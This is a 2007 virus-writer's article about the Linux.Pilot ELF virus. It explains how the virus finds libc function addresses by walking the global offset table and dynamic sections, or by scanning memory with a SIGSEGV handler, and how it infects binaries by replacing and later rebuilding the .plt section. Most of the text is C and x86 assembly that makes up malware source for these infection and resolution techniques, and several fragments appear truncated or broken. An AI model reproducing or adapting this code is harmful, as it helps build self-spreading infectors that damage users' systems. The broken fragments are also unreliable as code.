INT 0x80? No, thank you!

herm1t, 2007-21-11

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After finishing the Lacrimae virus which is able to extend any section and thus import library functions, I spent some time thinking how an ordinary virus can use the libc or any other library. There are a lot of opportunities for the viruses having such a feature. Here I wish to present a method to do it, using test virus Linux.Pilot as an example.

As late as in 2002 the grugq published a nice method of resolving symbols at run-time utilizing the pointer to the link_map structure, saved within program's GOT by dynamic linker [1]. As another BugTraq writer stated - this was known even earlier, but to my great surprise, I didn't saw any virus using this technique. My results were similar to the ones obtained by grugq, though I decided do not use link_map. There is a another method, more simple and independent of how lazy the dynamic linker is.

Obtaining libc address

We will make advantage of the fact that the dynamic linker and (most likely) the program are using libc. To obtain the base address of libc and, hence, the access to its functions and symbol table (to find function addresses) we will subsequently examine the contents of the global offset table in current process, dynamic linker and libc. The memory after loading the executable (and all its libraries) may look as follows:

      Lazy linking                             "Immediate" linking
      .text                                    .text
      malloc: <------+                         
                     |                         libcfoo: <-----+
      /lib/                                      |
      .text          |                         .text          |
      _dl_runtime_resolve: <--+                               |
                     |        |                               |
      .got.plt       |        |                .got.plt       |
GOT[0]|          |   |        |                |          |   |
GOT[1]|          |   |        |                |          |   |
GOT[2]|          |   |        |                |          |   |
GOT[3]| memalign |   |        |                | memalign |   |
GOT[4]| malloc   | --+        |                | malloc   |   |
                              |                               |
      Program                 |                               |
      .plt push  GOT[1]       |                .plt           |
           jmp   GOT[2]       |                               |
      .plt+16                 |                .plt+16        |
      [email protected]:            |                               |
           jmp   GOT[3]       |                    jmp GOT[3] |
           push  0 <----+     |                               |
           jmp   .plt   |     |                               |
      .got.plt          |     |                .got.plt       |
GOT[0]| .dynamic |      |     |                | .dynamic |   |
GOT[1]| link_map |      |     |                |          |   |
GOT[2]| _resolve | -----|-----+                |       0  |   |
GOT[3]| libcfoo  | -----+                      | libcfoo  | --+        

The actions for each step are much the same:

This is exactly what unwind function is doing:

void unwind(uint32_t addr, uint32_t **got, Elf32_Dyn **dyn, uint32_t *delta)
	get_dyn_file_base(get_base(addr), dyn, delta);
	*got = get_from_dyn(*dyn, DT_PLTGOT);
	printf("unwind: GOT=%08x DYNAMIC=%08x DELTA=%08x\n", *got, *dyn, *delta);

To start "unwinding" the loaded elves we need the address of GOT. You can either call unwind for some adress within the current process and get the address of GOT, or the address of GOT could be saved in the subsequent virus generation by the infection routine.

By repeating this sequence with GOT[2] as argument we will get base, dynamic, delta and got of the dynamic linker. Since it is using the libc itself, let's do it one more time for linker's GOT[4] and we will find those addresses of libc. Now, one could use the hash and dynamic symbol table to resolve the addresses of functions. I'm using here GOT[4], not GOT[3], because in older version of libc it was reserved.

If the executable was started with LD_BIND_NOW (all addresses were resolved before starting the program), run the unwind function once for any libc' GOT entry in the current process. For the sake of simplicity Linux.Pilot doesn't check if the GOT entry really intended to be filled with address of libc function, while one may find the __libc_start_main's GOT entry (just to be sure).

Consider the following example:

int main(int argc, char **argv, char **envp)
	uint32_t *got, delta;
	Elf32_Dyn *dyn;
	unwind((uint32_t)main, &got, &dyn, & delta);
	if (got[2])
		unwind(got[2], &got, &dyn, & delta);
	unwind(got[4], &got, &dyn, &delta);
	Elf32_Sym *dynsym;
	char *dynstr;
	uint32_t *hash;
	void (*printf_ptr)(char*,...);

	dynsym = (Elf32_Sym*)get_from_dyn(dyn, DT_SYMTAB);
	dynstr = get_from_dyn(dyn, DT_STRTAB);
	hash = get_from_dyn(dyn, DT_HASH);
	printf_ptr = (void(*)(char*,...))(lookup("printf", hash, dynsym, dynstr) + delta);
	printf_ptr("Hello, world! printf = %08x\n", (uint32_t)printf_ptr);

The lookup returns the st_value field from the matched dynamic symbol table entry. [2]

The output of the sample program on the prelinked system may look like this:

$ ./a.out 
unwind: GOT=08049914 DYNAMIC=08049848 DELTA=00000000
unwind: GOT=0052afb4 DYNAMIC=0052aef4 DELTA=00000000
unwind: GOT=0021fff4 DYNAMIC=0021fd1c DELTA=00000000
Hello, world! printf = 00142810
$ export LD_BIND_NOW=1 && ./a.out 
unwind: GOT=08049914 DYNAMIC=08049848 DELTA=00000000
unwind: GOT=0021fff4 DYNAMIC=0021fd1c DELTA=00000000
Hello, world! printf = 00142810

That's how we can obtain the addresses of functions within libc without single syscall.

The above functions in assembler:

unwind:		push	eax
		call	get_base
		xchg	eax, edi
		push	edi
		call	get_dyn_file_base
;		or	eax, eax
;		jz	fail
		xchg	eax, esi
		sub	edi, edx
		add	esi, edi
		push	DT_PLTGOT
		push	esi
		call	get_from_dyn
;		or	eax, eax
;		jz	fail
		xchg	eax, ecx

; get_base(addr) - return base address of the loaded ELF file
get_base:	mov	eax, [esp + 4]
		and	ax, 0xf000
	.loop:	cmp	dword [eax + 0], 0x464c457f
		jne	.next
;		cmp	dword [eax + 4], 0x00010101
;		jne	.next
		retn	4
	.next:	sub	eax, 4096
		jmp	.loop
; get_from_dyn(DYNAMIC, tag) - return the DYNAMIC entry with given tag
get_from_dyn:	push	esi
		mov	esi, [esp + 8]
	.loop:	lodsd
		or	eax, eax
		jz	.done
		cmp	eax, [esp + 12]
		je	.done
		jmp	.loop
	.done:	lodsd
		pop	esi
		retn	8
; uint64_t get_dyn_file_base(elf_file) return VA of DYNAMIC and lowest VA in ELF file
		mov	esi, [esp + 36]
		movzx	ecx, word [esi + e_phnum]
		add	esi, [esi + e_phoff]
		xor	eax, eax
		dec	edx
	.loop:	mov	ebx, [esi + p_type]
		cmp	ebx, PT_LOAD
		jne	.more
		cmp	[esi + p_vaddr], edx
		jae	.more
		mov	edx, [esi + p_vaddr]
	.more:	cmp	ebx, PT_DYNAMIC
		jne	.next
		mov	eax, [esi + p_vaddr]
	.next:	add	esi, 32
		loop	.loop
		inc	edx
		jz	.fail
		dec	edx
	.fail:	mov	[esp + 28], eax
		mov	[esp + 20], edx
		retn	4

Since Linux.Pilot is a cavity infector which replaces the .plt section with iself, it doesn't need the first call to unwind. It will grab the GOT+8 address from the PLT directly:

_plt:		push	dword [_GLOBAL_OFFSET_TABLE_ + 4]
		jmp	dword [_GLOBAL_OFFSET_TABLE_ + 8]
		dd	0
; virus begins from the first PLT entry
; calculate the address of virus and substract eight from it
; to fetch the GOT+8 offset from the jmp instruction above
main:		pusha
		call	.l0
.l0:		pop	ebp
		sub	ebp, (.l0 - main)
; instead of this
		mov	ebx, [ebp - 8]				; GOT + 8
; you may use unwind here:
; mov	eax, ebp
; call	unwind
; lea	ebx, [ecx + 8]
		mov	eax, [ebx]				; GOT[2] - _dl_runtime_resolve
		or	eax, eax
		jnz	.lazy
		; address is empty, LD_BIND_NOW is set?
		; use GOT[4], hope that this is libc...
		; this should be checked
		mov	eax, [ebx + 8]				
		jmp	.bnow
.lazy:		call	unwind
		mov	eax, [ecx + 16]				; GOT[4] - address of libc' function 
.bnow:		call	unwind					; within interp
		; now we have
		; esi 		- libc' DYNAMIC
		; edi 		- libc' delta
		; ecx 		- libc' GOT

Brute force

The address of the loaded ELF files could be found by brute force search. We can install signal handler to catch the SIGSEGV (which will raise on invalid memory references) and look through the whole address space of the process. Since libc library is larger than 1Mb we can increase the step of the search to fasten the search. The code below will work both on 2.4 and 2.6:

; compile with nasm -f elf search.asm -o search.o; gcc search.o -o search
		BITS	32
		CPU	386
		global	main
		extern	signal,printf
		section	.text
main:		pusha
;		push	segv
;		push	11
;		call	signal
;		add	esp, 8
		push	sret
		push	0x4000000
		push	0
		push	segv
		mov	eax, 67		; sigaction
		mov	ebx, 11
		mov	ecx, esp
		mov	edx, 0
		int	0x80
		add	esp, 16

		xor	eax, eax
	.next:	mov	edx, [eax]	; BANG!
		mov	ebx, eax
		and	eax, 0xfffff000
	.down:	cmp	dword [eax], 0x464c457f
		je	.found
		sub	eax, 0x1000
		jmp	.down
	.found:	push	eax
		push	format
		call	printf
		pop	eax
		pop	eax
		mov	eax, ebx
	.up:	add	eax, 0x1000
		mov	ecx, [eax]
		jmp	.up
	.done:	popa
segv:		mov	eax, [esp + 0x34]
		add	dword [esp + 0x34], 1048576
		cmp	[esp + 0x34], eax
		jb	.done
		mov     dword [esp + 0x40],
	.done:	mov     dword [esp + 0x40], main.done
		db	0
		align	8
sret:		pop	eax
		mov	eax, 119	; sigreturn
		int	0x80

		section	.data
format		db	'Found ELF at %08x',10,0

The only thing that is left (as an excercise to the reader) is to check whether the found ELF is indeed the libc, one can do that, for example, by checking the DT_SONAME field in the dynamic segment or by other means.

Teaching old ELFs new tricks

And a few words about PiLoT's infection routine. It is using the fact that you can replace any loadable section which does not take part in the process of execution and linking of the file. The virus can move (or compress) the .text section and restore it on exit. This virus doing the same with Procedure Linkage Table (.plt section). Nice thing about PLT is that you don't need to save its contents only a few constants.

Let's look to it closer (this is /bin/ps from my system, address of GOT (Global Offset Table) is 080570e8):

 8048e58:  ,--->ff 35 ec 70 05 08       pushl  0x80570ec	; GOT[1] address of link_map
 8048e5e:  |||  ff 25 f0 70 05 08       jmp    *0x80570f0	; GOT[2] address of resolve
08048e68 <[email protected]>:
 8048e68:  |||  ff 25 f4 70 05 08       jmp    *0x80570f4	; GOT + 12
 8048e6e:  |||  68 00 00 00 00          push   $0x0		; 0
 8048e73:  ||`--e9 e0 ff ff ff          jmp    8048e58
08048e78 <[email protected]>:
 8048e78:  ||   ff 25 f8 70 05 08       jmp    *0x80570f8	; GOT + 16
 8048e7e:  ||   68 08 00 00 00          push   $0x8		; 8
 8048e83:  |`---e9 d0 ff ff ff          jmp    8048e58
08048e88 <[email protected]>:
 8048e88:  |    ff 25 fc 70 05 08       jmp    *0x80570fc	; GOT + 20
 8048e8e:  |    68 10 00 00 00          push   $0x10		; 16
 8048e93:  `----e9 c0 ff ff ff          jmp    8048e58

Note, that addresses of the GOT entries (jmp *0x?) and offsets in the relocation table (push $0x0) are sorted, and the jump and the end of each function helper is pointing to the beginning of PLT, so you can build PLT table for the given executable from scratch having only the address of GOT. To be sure, PiLoT memorizes values of GOT pointer and offset in relocation table, the number of entries in the table and checks that these values are increasing with the given step. This check could be implemented as follows:

	uint32_t gotp, orel;
	gotp = orel = 0;
	for (i = 16; i < psz; i += 16) {
		if (gotp != 0) {
			if (*(uint32_t*)(plt + i + 2) - gotp != 4)
				goto failed;
			if (*(uint32_t*)(plt + i + 7) - orel != 8)
				goto failed;
		gotp = *(uint32_t*)(plt + i + 2);
		orel = *(uint32_t*)(plt + i + 7);		

Where plt is the pointer to the .plt section and psz its size.

The virus must restore the PLT before the main program starts to invoke library functions and since the program itself is started by __libc_start_main() this method is incompatible with EPO. To restore the PLT virus should allocate memory for itself, jump there and reconstruct the table:

		; restore .plt
		mov	eax, ebp		; ebp is .plt + 16
		and	ax, 0xf000
		push	4096
		push	eax
		call	mprotect
		mov	edx, dword 0x08049000	; first pointer to GOT
first_got	equ	$-4-main
		mov	esi, dword 0x00000000	; first offset in .rel.plt
first_rel	equ	$-4-main
		mov	eax, dword 0xffffffe0	; jump
		mov	edi, ebp
		mov	ecx, dword 1
plt_count	equ	$-4-main
	.fix:	push	eax
		mov	ax, 0x25ff
		mov	eax, edx
		mov	al, 0x68
		mov	eax, esi
		mov	al, 0xe9
		pop	eax
		sub	eax, 16
		add	esi, 8
		add	edx, 4
		loop	.fix
		mov	byte [esp + 8], PROT_READ|PROT_EXEC
		call	mprotect
		add	esp, 12

Comments are welcome. <[email protected]>


  1. the grugq "More ELF buggery...", May, 2002,
  2. herm1t "Hashing the elves", Oct 2007
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